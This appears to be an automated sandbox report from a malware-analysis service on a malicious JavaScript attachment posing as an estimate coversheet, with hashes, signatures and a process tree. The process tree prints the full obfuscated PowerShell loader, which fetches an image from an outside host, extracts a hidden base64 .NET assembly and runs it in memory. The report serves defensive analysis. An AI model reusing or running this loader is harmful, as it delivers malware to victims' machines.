Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
30/10/2023, 22:54
Static task
static1
Behavioral task
behavioral1
Sample
Coversheet_Estimate_Rsf38664.js
Resource
win7-20231020-en
General
-
Target
Coversheet_Estimate_Rsf38664.js
-
Size
205KB
-
MD5
1ccf9ca9abc89e65e76f9b18999e26ef
-
SHA1
7862d256a30b52e7a3436767a87f310de36d0af7
-
SHA256
26828d3ea7e3871515fd25c9c5ca4306d3a5e19781d7228e8ee074e4ecb128a5
-
SHA512
ab9242b042c3ee84b9ad8e86a443c92c45acaa81c92926b7a804b3ec8c0fb186b75d95a7a27d7830f9f15e474a262d90f10f5a5e007f6d42de2e279ed8299abe
-
SSDEEP
3072:f4b5PAkV+hVJro/B0hsTSD5kyikiC+kQ6DLbi9u6uRSqFBeWpl:U1cqkF
Malware Config
Extracted
https://wallpapercave.com/uwp/uwp4098452.png
https://wallpapercave.com/uwp/uwp4098452.png
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2816 powershell.exe 4 2816 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3068 powershell.exe 2816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2148 wrote to memory of 3068 2148 wscript.exe 28 PID 2148 wrote to memory of 3068 2148 wscript.exe 28 PID 2148 wrote to memory of 3068 2148 wscript.exe 28 PID 3068 wrote to memory of 2816 3068 powershell.exe 30 PID 3068 wrote to memory of 2816 3068 powershell.exe 30 PID 3068 wrote to memory of 2816 3068 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Coversheet_Estimate_Rsf38664.js1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J☪❞Bp☪❞G0☪❞YQBn☪❞GU☪❞VQBy☪❞Gw☪❞I☪❞☪❞9☪❞C☪❞☪❞JwBo☪❞HQ☪❞d☪❞Bw☪❞HM☪❞Og☪❞v☪❞C8☪❞dwBh☪❞Gw☪❞b☪❞Bw☪❞GE☪❞c☪❞Bl☪❞HI☪❞YwBh☪❞HY☪❞ZQ☪❞u☪❞GM☪❞bwBt☪❞C8☪❞dQB3☪❞H☪❞☪❞LwB1☪❞Hc☪❞c☪❞☪❞0☪❞D☪❞☪❞OQ☪❞4☪❞DQ☪❞NQ☪❞y☪❞C4☪❞c☪❞Bu☪❞Gc☪❞Jw☪❞7☪❞CQ☪❞dwBl☪❞GI☪❞QwBs☪❞Gk☪❞ZQBu☪❞HQ☪❞I☪❞☪❞9☪❞C☪❞☪❞TgBl☪❞Hc☪❞LQBP☪❞GI☪❞agBl☪❞GM☪❞d☪❞☪❞g☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞TgBl☪❞HQ☪❞LgBX☪❞GU☪❞YgBD☪❞Gw☪❞aQBl☪❞G4☪❞d☪❞☪❞7☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞g☪❞D0☪❞I☪❞☪❞k☪❞Hc☪❞ZQBi☪❞EM☪❞b☪❞Bp☪❞GU☪❞bgB0☪❞C4☪❞R☪❞Bv☪❞Hc☪❞bgBs☪❞G8☪❞YQBk☪❞EQ☪❞YQB0☪❞GE☪❞K☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBV☪❞HI☪❞b☪❞☪❞p☪❞Ds☪❞J☪❞Bp☪❞G0☪❞YQBn☪❞GU☪❞V☪❞Bl☪❞Hg☪❞d☪❞☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞V☪❞Bl☪❞Hg☪❞d☪❞☪❞u☪❞EU☪❞bgBj☪❞G8☪❞Z☪❞Bp☪❞G4☪❞ZwBd☪❞Do☪❞OgBV☪❞FQ☪❞Rg☪❞4☪❞C4☪❞RwBl☪❞HQ☪❞UwB0☪❞HI☪❞aQBu☪❞Gc☪❞K☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBC☪❞Hk☪❞d☪❞Bl☪❞HM☪❞KQ☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞I☪❞☪❞9☪❞C☪❞☪❞Jw☪❞8☪❞Dw☪❞QgBB☪❞FM☪❞RQ☪❞2☪❞DQ☪❞XwBT☪❞FQ☪❞QQBS☪❞FQ☪❞Pg☪❞+☪❞Cc☪❞Ow☪❞k☪❞GU☪❞bgBk☪❞EY☪❞b☪❞Bh☪❞Gc☪❞I☪❞☪❞9☪❞C☪❞☪❞Jw☪❞8☪❞Dw☪❞QgBB☪❞FM☪❞RQ☪❞2☪❞DQ☪❞XwBF☪❞E4☪❞R☪❞☪❞+☪❞D4☪❞Jw☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞g☪❞D0☪❞I☪❞☪❞k☪❞Gk☪❞bQBh☪❞Gc☪❞ZQBU☪❞GU☪❞e☪❞B0☪❞C4☪❞SQBu☪❞GQ☪❞ZQB4☪❞E8☪❞Zg☪❞o☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞KQ☪❞7☪❞CQ☪❞ZQBu☪❞GQ☪❞SQBu☪❞GQ☪❞ZQB4☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞FQ☪❞ZQB4☪❞HQ☪❞LgBJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞TwBm☪❞Cg☪❞J☪❞Bl☪❞G4☪❞Z☪❞BG☪❞Gw☪❞YQBn☪❞Ck☪❞Ow☪❞k☪❞HM☪❞d☪❞Bh☪❞HI☪❞d☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞Gc☪❞ZQ☪❞g☪❞D☪❞☪❞I☪❞☪❞t☪❞GE☪❞bgBk☪❞C☪❞☪❞J☪❞Bl☪❞G4☪❞Z☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞Gc☪❞d☪❞☪❞g☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞7☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞g☪❞Cs☪❞PQ☪❞g☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞EY☪❞b☪❞Bh☪❞Gc☪❞LgBM☪❞GU☪❞bgBn☪❞HQ☪❞a☪❞☪❞7☪❞CQ☪❞YgBh☪❞HM☪❞ZQ☪❞2☪❞DQ☪❞T☪❞Bl☪❞G4☪❞ZwB0☪❞Gg☪❞I☪❞☪❞9☪❞C☪❞☪❞J☪❞Bl☪❞G4☪❞Z☪❞BJ☪❞G4☪❞Z☪❞Bl☪❞Hg☪❞I☪❞☪❞t☪❞C☪❞☪❞J☪❞Bz☪❞HQ☪❞YQBy☪❞HQ☪❞SQBu☪❞GQ☪❞ZQB4☪❞Ds☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BD☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞aQBt☪❞GE☪❞ZwBl☪❞FQ☪❞ZQB4☪❞HQ☪❞LgBT☪❞HU☪❞YgBz☪❞HQ☪❞cgBp☪❞G4☪❞Zw☪❞o☪❞CQ☪❞cwB0☪❞GE☪❞cgB0☪❞Ek☪❞bgBk☪❞GU☪❞e☪❞☪❞s☪❞C☪❞☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BM☪❞GU☪❞bgBn☪❞HQ☪❞a☪❞☪❞p☪❞Ds☪❞J☪❞Bj☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞QwBv☪❞G4☪❞dgBl☪❞HI☪❞d☪❞Bd☪❞Do☪❞OgBG☪❞HI☪❞bwBt☪❞EI☪❞YQBz☪❞GU☪❞Ng☪❞0☪❞FM☪❞d☪❞By☪❞Gk☪❞bgBn☪❞Cg☪❞J☪❞Bi☪❞GE☪❞cwBl☪❞DY☪❞N☪❞BD☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞Ck☪❞Ow☪❞k☪❞Gw☪❞bwBh☪❞GQ☪❞ZQBk☪❞EE☪❞cwBz☪❞GU☪❞bQBi☪❞Gw☪❞eQ☪❞g☪❞D0☪❞I☪❞Bb☪❞FM☪❞eQBz☪❞HQ☪❞ZQBt☪❞C4☪❞UgBl☪❞GY☪❞b☪❞Bl☪❞GM☪❞d☪❞Bp☪❞G8☪❞bg☪❞u☪❞EE☪❞cwBz☪❞GU☪❞bQBi☪❞Gw☪❞eQBd☪❞Do☪❞OgBM☪❞G8☪❞YQBk☪❞Cg☪❞J☪❞Bj☪❞G8☪❞bQBt☪❞GE☪❞bgBk☪❞EI☪❞eQB0☪❞GU☪❞cw☪❞p☪❞Ds☪❞J☪❞B0☪❞Hk☪❞c☪❞Bl☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞b☪❞Bv☪❞GE☪❞Z☪❞Bl☪❞GQ☪❞QQBz☪❞HM☪❞ZQBt☪❞GI☪❞b☪❞B5☪❞C4☪❞RwBl☪❞HQ☪❞V☪❞B5☪❞H☪❞☪❞ZQ☪❞o☪❞Cc☪❞RgBp☪❞GI☪❞ZQBy☪❞C4☪❞S☪❞Bv☪❞G0☪❞ZQ☪❞n☪❞Ck☪❞Ow☪❞k☪❞G0☪❞ZQB0☪❞Gg☪❞bwBk☪❞C☪❞☪❞PQ☪❞g☪❞CQ☪❞d☪❞B5☪❞H☪❞☪❞ZQ☪❞u☪❞Ec☪❞ZQB0☪❞E0☪❞ZQB0☪❞Gg☪❞bwBk☪❞Cg☪❞JwBW☪❞EE☪❞SQ☪❞n☪❞Ck☪❞LgBJ☪❞G4☪❞dgBv☪❞Gs☪❞ZQ☪❞o☪❞CQ☪❞bgB1☪❞Gw☪❞b☪❞☪❞s☪❞C☪❞☪❞WwBv☪❞GI☪❞agBl☪❞GM☪❞d☪❞Bb☪❞F0☪❞XQ☪❞g☪❞Cg☪❞JwBN☪❞EM☪❞OQBt☪❞GU☪❞b☪❞BR☪❞Hc☪❞ZQBp☪❞Dk☪❞awBM☪❞DI☪❞VgBs☪❞Ew☪❞bQBW☪❞D☪❞☪❞Yw☪❞y☪❞EY☪❞dwBM☪❞Hk☪❞O☪❞☪❞2☪❞GM☪❞MwBC☪❞D☪❞☪❞Z☪❞BH☪❞Gc☪❞PQ☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞MQ☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞Jw☪❞g☪❞Cw☪❞I☪❞☪❞n☪❞Cc☪❞I☪❞☪❞s☪❞C☪❞☪❞Jw☪❞n☪❞C☪❞☪❞L☪❞☪❞g☪❞Cc☪❞Jw☪❞g☪❞Cw☪❞I☪❞☪❞n☪❞Cc☪❞KQ☪❞p☪❞☪❞==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.repl"ace('☪❞','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098452.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('MC9melQwei9kL2VlLmV0c2FwLy86c3B0dGg=' , '1' , '' , '' , '' , '' , ''))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58706a1b92da94063f2349bdaecd1fa93
SHA163f237fe590c1f6c18a6e4058e23a2ceb180c9c7
SHA2566a67aff4ae22e61c457bf18aa19e6967d93aef58858e2efba1bcf21895c043a2
SHA51252f36ddd23547b4e412a1fc066fa3ad40158493439679b0e4a582ef50df6ebdbc11cadcd96b14e2d25628510e96dcf36112cab4262d56fa5d6fb1749f9c57f21
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K438CXZGV6KTG2YZJYPT.temp
Filesize7KB
MD58706a1b92da94063f2349bdaecd1fa93
SHA163f237fe590c1f6c18a6e4058e23a2ceb180c9c7
SHA2566a67aff4ae22e61c457bf18aa19e6967d93aef58858e2efba1bcf21895c043a2
SHA51252f36ddd23547b4e412a1fc066fa3ad40158493439679b0e4a582ef50df6ebdbc11cadcd96b14e2d25628510e96dcf36112cab4262d56fa5d6fb1749f9c57f21